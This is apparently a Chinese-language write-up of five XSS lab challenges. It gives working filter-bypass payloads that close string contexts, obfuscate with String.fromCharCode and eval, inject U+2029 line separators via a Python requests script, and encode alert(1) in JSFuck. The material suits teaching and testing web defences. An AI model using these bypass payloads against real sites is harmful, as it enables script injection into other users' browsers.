xss_1
过滤了最常用的script标签,换用img
">
xss_2
根据输出点,先闭合if语句,在闭合后面的:)
构造语句
1");alert(1);("
xss_3
跟第二个有点像
'');var a='String.fro'; var b='mCharC'; var c='ode(97, 108, 101, 114, 116, 40, 49, 41)'; var d=a+b+c; eval(eval(d));(''
xss_4
感谢 fyth
在群里,有个伙伴做出来了,然后扔出payload
document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)
在控制台里运行把,把0x2029这个换行符回车写到data里面, 然后在提交。
在提交过程中抓包,可以看的更明白,
data=%E2%80%A9eval%28%27al%27%2B%27ert%27%29%281%29%3B%E2%80%A9
前面的%E2%80%A9就是回车。成功提交就alert(1)
思考:
document.getElementsByName('data')[0].value=String.fromCharCode(0x2029)+"eval('al'+'ert')(1);"+String.fromCharCode(0x2029)
0x1
是在开头和结尾都写个回车换行符,
去掉结尾点依然可以成功alert(1)
0x2
百度可知0x2029表示回车 or 段落分隔符
那么0x2028表示新行 or 行分隔符.
将0x2029换成0x2028依然能够成功
0x3
提交过程中抓包得到的
data=%E2%80%A9
在提交数据包时,burp拦截,将post数据十六进制改完E2 80 A9也成功换行
0x4
python写出
#!/usr/bin/env python
import requests
resp = requests.post("http://xss.swpuwllm.com/xss_4/",data={'data':u"\u2029eval('al'+'ert')(1)"})
a = resp.content
print a
可看到返回页面
0x5
fuzzing一下发现过滤来字母,但是{}[]()!+这种没有过滤,立马想到jother编码,但是没成功,换成jsfuck编码,alert(1)编码后提交成功.jother和jsfuck有区别么?alert(1)经jsfuck编码后的字符量比jother编码少,why?
[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()